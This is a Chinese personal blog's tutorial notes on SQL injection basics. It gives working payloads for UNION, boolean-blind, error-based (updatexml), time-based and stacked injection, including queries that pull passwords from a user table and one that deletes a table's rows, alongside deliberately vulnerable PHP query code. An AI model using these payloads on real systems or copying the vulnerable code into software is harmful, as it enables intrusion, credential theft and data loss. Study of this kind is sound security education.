

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://img.mkerosene.cn/touxiang.jpg">
  <link rel="icon" href="https://img.mkerosene.cn/touxiang.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Kerosene W">
  <meta name="keywords" content="">
  
    <meta name="description" content="sqli判断数据库类型 一言以蔽之，通过各个数据库的特性以及报错信息的不同，就可以确定下目标数据库类型  默认端口判断 Oracle：1521   SQL Server：1433   MySQL ：3306   数据库特有的数据表判断 oracle数据库  1test.php?id&#x3D;1 and (select count(*) from sys.user_tables)&gt;0 and 1&#x3D;1">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli基础">
<meta property="og:url" content="http://example.com/2021/08/23/sqli%E5%9F%BA%E7%A1%80/index.html">
<meta property="og:site_name" content="追求源于热爱">
<meta property="og:description" content="sqli判断数据库类型 一言以蔽之，通过各个数据库的特性以及报错信息的不同，就可以确定下目标数据库类型  默认端口判断 Oracle：1521   SQL Server：1433   MySQL ：3306   数据库特有的数据表判断 oracle数据库  1test.php?id&#x3D;1 and (select count(*) from sys.user_tables)&gt;0 and 1&#x3D;1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.mkerosene.cn/sql.png">
<meta property="article:published_time" content="2021-08-23T14:13:17.000Z">
<meta property="article:modified_time" content="2021-10-14T15:52:34.088Z">
<meta property="article:author" content="Kerosene W">
<meta property="article:tag" content="sqli">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://img.mkerosene.cn/sql.png">
  
  
  <title>sqli基础 - 追求源于热爱</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.13","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"❡"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"https://img.mkerosene.cn/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"FI1uAFAYz0Q3MPDiORqd0JAN-gzGzoHsz","app_key":"EhKAjMe3bmq0WLTSgktGg2OC","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>mKerosene</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://img.mkerosene.cn/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqli基础">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-08-23 22:13" pubdate>
        2021年8月23日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.4k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      11 分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sqli基础</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：1 年前
                
              </p>
            
            <div class="markdown-body">
              <h1 id="sqli"><a href="#sqli" class="headerlink" title="sqli"></a>sqli</h1><h2 id="判断数据库类型"><a href="#判断数据库类型" class="headerlink" title="判断数据库类型"></a>判断数据库类型</h2><ul>
<li><p>一言以蔽之，通过各个数据库的特性以及报错信息的不同，就可以确定下目标数据库类型</p>
</li>
<li><h5 id="默认端口判断"><a href="#默认端口判断" class="headerlink" title="默认端口判断"></a>默认端口判断</h5><blockquote>
<p>Oracle：1521</p>
</blockquote>
<blockquote>
<p>SQL Server：1433</p>
</blockquote>
<blockquote>
<p>MySQL ：3306</p>
</blockquote>
</li>
<li><h5 id="数据库特有的数据表判断"><a href="#数据库特有的数据表判断" class="headerlink" title="数据库特有的数据表判断"></a>数据库特有的数据表判断</h5><ul>
<li><h6 id="oracle数据库"><a href="#oracle数据库" class="headerlink" title="oracle数据库"></a>oracle数据库</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from sys.user_tables)&gt;0 and 1=1<br></code></pre></td></tr></table></figure>

<ul>
<li><h6 id="mysql数据库-mysql版本在5-0以上"><a href="#mysql数据库-mysql版本在5-0以上" class="headerlink" title="mysql数据库(mysql版本在5.0以上)"></a>mysql数据库(mysql版本在5.0以上)</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from information_schema.TABLES)&gt;0 and 1=1<br></code></pre></td></tr></table></figure>

<ul>
<li><h6 id="access数据库"><a href="#access数据库" class="headerlink" title="access数据库"></a>access数据库</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from msysobjects)&gt;0 and 1=1<br></code></pre></td></tr></table></figure>

<ul>
<li><h6 id="mssql数据库"><a href="#mssql数据库" class="headerlink" title="mssql数据库"></a>mssql数据库</h6></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=1 and (select count(*) from sysobjects)&gt;0 and 1=1<br></code></pre></td></tr></table></figure></li>
</ul>
<hr>
<h3 id="注入基础"><a href="#注入基础" class="headerlink" title="注入基础"></a>注入基础</h3><blockquote>
<h4 id="基本流程"><a href="#基本流程" class="headerlink" title="基本流程"></a>基本流程</h4></blockquote>
<ul>
<li>Get型 整型与字符型注入判断 –+(– -)表示注释其后内容</li>
<li>判断列数：order by n(n+1)</li>
<li>判断显示位select 1,2,3,4…n(n+1)</li>
</ul>
<blockquote>
<p>Point</p>
</blockquote>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs elixir">group_concat() 把相同的值全部以逗号分割的形式列出来<br><span class="hljs-number">1</span><span class="hljs-symbol">:system_user</span>()  系统用户名<br><span class="hljs-number">2</span><span class="hljs-symbol">:user</span>()         用户名<br><span class="hljs-number">3</span><span class="hljs-symbol">:current_user</span>   当前用户名<br><span class="hljs-number">4</span><span class="hljs-symbol">:session_user</span>()  连接数据库的用户名<br><span class="hljs-number">5</span><span class="hljs-symbol">:database</span>()     数据库名<br><span class="hljs-number">6</span><span class="hljs-symbol">:version</span>()       MYSQL数据库版本<br><span class="hljs-number">7</span><span class="hljs-symbol">:load_file</span>()      转成<span class="hljs-number">16</span>进制或者是<span class="hljs-number">10</span>进制 MYSQL读取本地文件的函数<br><span class="hljs-number">8</span><span class="hljs-symbol">:</span><span class="hljs-variable">@@datadir</span>     读取数据库路径<br><span class="hljs-number">9</span><span class="hljs-symbol">:</span><span class="hljs-variable">@@basedir</span>     MYSQL安装路径<br><span class="hljs-number">10</span><span class="hljs-symbol">:</span><span class="hljs-variable">@@version_compile_os</span>     操作系统<br></code></pre></td></tr></table></figure>



<hr>
<blockquote>
<h4 id="数字型注入和UNION注入"><a href="#数字型注入和UNION注入" class="headerlink" title="数字型注入和UNION注入"></a>数字型注入和UNION注入</h4></blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=2 #注入点<br></code></pre></td></tr></table></figure>

<ul>
<li>数字运算判断</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs shell">//源码<br>...<br><span class="hljs-meta">$</span><span class="bash">conn = mysqli_connect(<span class="hljs-string">&quot;127.0.0.1&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;test&quot;</span>)</span><br><span class="hljs-meta">$</span><span class="bash">res = mysqli_query(<span class="hljs-variable">$conn</span>, <span class="hljs-string">&quot;SELECT title, content FROM wp_news WHERE id=&quot;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>])</span><br>...<br>//判断<br>test.php?id=3-1 #回显一致即可确定为数字注入，源码表现为输入点“$_GET[&#x27;id&#x27;]”附近无引号包裹<br></code></pre></td></tr></table></figure>

<ul>
<li>联合查询</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs SQL">#表名查询<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,group_concat(table_name) <span class="hljs-keyword">FROM</span> information_schema.tables <span class="hljs-keyword">WHERE</span> table_schema<span class="hljs-operator">=</span>database()<br>#列查询<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-number">1</span>,group_concat(column_name) <span class="hljs-keyword">FROM</span> information_schema.columns <span class="hljs-keyword">WHERE</span> table_name<span class="hljs-operator">=</span><span class="hljs-string">&#x27;wp_user&#x27;</span><br>#实例<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">2</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>,pwd <span class="hljs-keyword">FROM</span> wp_user<br>#显示控制(页面显示受限时)<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>,pwd <span class="hljs-keyword">FROM</span> wp_user limit <span class="hljs-number">1</span>,<span class="hljs-number">1</span>(显示查询效果的第二条)<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">user</span>,pwd <span class="hljs-keyword">FROM</span> wp_user<br><br></code></pre></td></tr></table></figure>



<hr>
<blockquote>
<h4 id="字符型注入和布尔盲注"><a href="#字符型注入和布尔盲注" class="headerlink" title="字符型注入和布尔盲注"></a>字符型注入和布尔盲注</h4></blockquote>
<ul>
<li>类型判断</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">//源码<br>...<br><span class="hljs-meta">$</span><span class="bash">res = mysqli_query(<span class="hljs-variable">$conn</span>,<span class="hljs-string">&quot;SELECT title,content FROM wp_news WHERE id=&#x27;&quot;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>].<span class="hljs-string">&quot;&#x27;&quot;</span>)</span><br>...<br>//判断<br>test.php?id=2a	#确定不是数字型后，加字母回显一致表明输入点被‘’包围，强制转换为字符串，确定为字符型<br></code></pre></td></tr></table></figure>

<ul>
<li>闭合+注释</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=2&#x27;%23<br>test.php?id=2&#x27;--+<br>test.php?id=2&#x27;--%20<br></code></pre></td></tr></table></figure>

<ul>
<li>闭合+闭合</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">test.php?id=2&#x27; and &#x27;1<br></code></pre></td></tr></table></figure>

<ul>
<li>布尔盲注</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sql">test.php?id<span class="hljs-operator">=</span><span class="hljs-number">2</span><span class="hljs-string">&#x27; and &#x27;</span>a<span class="hljs-string">&#x27;=&#x27;</span>a<span class="hljs-string">&#x27;	#原理</span><br><span class="hljs-string">test.php?id=2&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;f&#x27;</span><span class="hljs-operator">&lt;</span><span class="hljs-string">&#x27;n&#x27;</span>	#二分法猜测字符<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>第<span class="hljs-number">1</span>位字符<br>test.php?id<span class="hljs-operator">=</span><span class="hljs-number">2</span><span class="hljs-string">&#x27; and(select mid((select concat(user,0x7e,pwd)from wp_user),1,1))=&#x27;</span>a<span class="hljs-string">&#x27;%23</span><br><span class="hljs-string">//第2位字符</span><br><span class="hljs-string">test.php?id=2&#x27;</span> <span class="hljs-keyword">and</span>(<span class="hljs-keyword">select</span> mid((<span class="hljs-keyword">select</span> concat(<span class="hljs-keyword">user</span>,<span class="hljs-number">0x7e</span>,pwd)<span class="hljs-keyword">from</span> wp_user),<span class="hljs-number">2</span>,<span class="hljs-number">1</span>))<span class="hljs-operator">=</span><span class="hljs-string">&#x27;d&#x27;</span><span class="hljs-operator">%</span><span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>

<ul>
<li>时间盲注</li>
</ul>
<hr>
<blockquote>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4></blockquote>
<ul>
<li><p>原理</p>
<p>触发SQL语句错误并把错误信息输出</p>
</li>
<li><p><code>updatexml</code>报错</p>
</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql">test.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27; or updatexml(1,concat(0x7e,(select pwd from wp_user)),1)%23</span><br><span class="hljs-string">//源码</span><br><span class="hljs-string">...</span><br><span class="hljs-string">$res = mysqli_query($conn, &quot;SELECT title, content FROM wp_news WHERE id=&#x27;</span>&quot;.$_GET[&#x27;id&#x27;].&quot;<span class="hljs-string">&#x27;&quot;) OR VAR_DUMP(mysqli_error($conn));</span><br><span class="hljs-string">...</span><br></code></pre></td></tr></table></figure>

<ul>
<li>堆叠注入(修改数据库)</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//多语句执行源码</span><br><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-variable">$db</span> = <span class="hljs-keyword">new</span> PDO(<span class="hljs-string">&quot;mysql:host=localhost:3306;dbname=test&quot;</span>,<span class="hljs-string">&quot;root&quot;</span>,<span class="hljs-string">&#x27;root&#x27;</span>);<br>	<span class="hljs-variable">$sql</span> = <span class="hljs-string">&quot;SELECT title, content FROM wp_news WHERE id=&#x27;&quot;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>].<span class="hljs-string">&quot;&#x27;&quot;</span>;<br>...<br><span class="hljs-comment">//删除表wp_files中所有数据</span><br>test.php?id=<span class="hljs-number">1</span>%<span class="hljs-number">27</span>;delete%<span class="hljs-number">20</span>%<span class="hljs-number">20</span><span class="hljs-keyword">from</span>%<span class="hljs-number">20</span>wp_files;%<span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>

<hr>
<blockquote>
<h4 id="注入优先级"><a href="#注入优先级" class="headerlink" title="注入优先级"></a>注入优先级</h4></blockquote>
<p>​    UNION注入&gt;报错注入&gt;布尔盲注&gt;时间盲注</p>
<hr>
<h3 id="注入点"><a href="#注入点" class="headerlink" title="注入点"></a>注入点</h3><blockquote>
<h4 id="SELECT注入"><a href="#SELECT注入" class="headerlink" title="SELECT注入"></a>SELECT注入</h4></blockquote>
<ol>
<li>注入点在select_expr</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql">test.php?id<span class="hljs-operator">=</span>(<span class="hljs-keyword">select</span> pwd <span class="hljs-keyword">from</span> wp_user) <span class="hljs-keyword">as</span> title	#<span class="hljs-keyword">AS</span>别名法<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select $&#123;_GET[&#x27;id&#x27;]&#125;, content from wp_news&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="2">
<li>注入点在table_reference</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs SQL">test.php?<span class="hljs-keyword">table</span><span class="hljs-operator">=</span>(<span class="hljs-keyword">select</span> pwd <span class="hljs-keyword">as</span> title <span class="hljs-keyword">from</span> wp_user)<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select title from $&#123;_GET[&#x27;table&#x27;]&#125;&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="3">
<li>注入点在WHERE或HAVING后</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select title from wp_news where id = $&#123;_GET[id]&#125;&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="4">
<li>注入点在GROUP by或order by后</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">/</span><span class="hljs-operator">/</span>时间注入<br>test.php?title<span class="hljs-operator">=</span>id <span class="hljs-keyword">desc</span>,(<span class="hljs-number">1</span>,if(sleep(<span class="hljs-number">1</span>),<span class="hljs-number">1</span>))<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>源码<br>...<br>$res <span class="hljs-operator">=</span> mysqli_query($conn, &quot;select title from wp_news group by $&#123;_GET[&#x27;title&#x27;]&#125;&quot;);<br>...<br></code></pre></td></tr></table></figure>

<ol start="5">
<li>注入点在LIMIT后</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><br></code></pre></td></tr></table></figure>



<hr>
<blockquote>
<h4 id="INSERT注入"><a href="#INSERT注入" class="headerlink" title="INSERT注入"></a>INSERT注入</h4></blockquote>
<hr>
<blockquote>
<h4 id="UPDATE注入"><a href="#UPDATE注入" class="headerlink" title="UPDATE注入"></a>UPDATE注入</h4></blockquote>
<hr>
<blockquote>
<h4 id="DELETE注入"><a href="#DELETE注入" class="headerlink" title="DELETE注入"></a>DELETE注入</h4></blockquote>
<h4 id=""><a href="#" class="headerlink" title=""></a></h4>
            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Cyber-Security/">Cyber-Security</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sqli/">sqli</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/09/08/%E7%A7%91%E6%9D%A5%E6%9D%AF%E5%9F%B9%E8%AE%AD/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">科来杯培训</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/12/ISCC2021-wp/">
                        <span class="hidden-mobile">ISCC2021-wp</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="twikoo"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/twikoo@1/dist/twikoo.all.min.js', function() {
        var options = Object.assign(
          {"envId":"blog-3gentarg3e6a1b5e","region":"ap-shanghai","path":"window.location.pathname"},
          {
            el: '#twikoo',
            path: 'window.location.pathname',
            onCommentLoaded: function() {
              Fluid.plugins.initFancyBox('#twikoo .tk-content img:not(.tk-owo-emotion)');
            }
          }
        )
        twikoo.init(options)
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div class="copyright">&copy;2020 - 2021 By Kerosene.W</div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>












  

  

  

  

  

  





